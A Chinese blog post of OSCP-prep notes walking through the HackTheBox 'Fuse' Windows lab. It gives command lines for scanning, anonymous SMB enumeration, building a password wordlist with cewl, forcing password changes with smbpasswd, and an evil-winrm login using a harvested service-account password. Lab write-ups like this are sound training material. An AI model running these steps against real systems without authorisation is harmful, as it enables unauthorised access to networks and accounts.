EthanDoctor

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

Ethan医生3个月前靶场144

fuse

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)

image.png

nslookup fabricorp.local  10.129.2.5

image.png

image.png


smbclient -L //10.129.2.5/ -N  

image.png


http://fuse.fabricorp.local/papercut/logs/html/index.htm

image.png

cewl -d 5 -m 3 -w password.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers



smbclient -L //10.129.2.5 -U tlavel%Fabricorp01

image.png



错误:Cannot connect to server. Error was NT_STATUS_PASSWORD_MUST_CHANGE
需要用smbpasswd修改密码


sudo smbpasswd -r 10.129.235.28 -U tlavel

smbpasswd -r 10.129.235.28 bhult

更新密码后直接登入然后提权


evil-winrm -i 10.129.235.28 -u svc-print -p '$fab@s3Rv1ce$1'

image.png


标签: OSCP
返回列表

上一篇:OSCP备考_0x54_HackThBox靶机_Windows_remote

下一篇:OSCP备考_0x56_HackThBox靶机_Windows_worker

相关文章

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号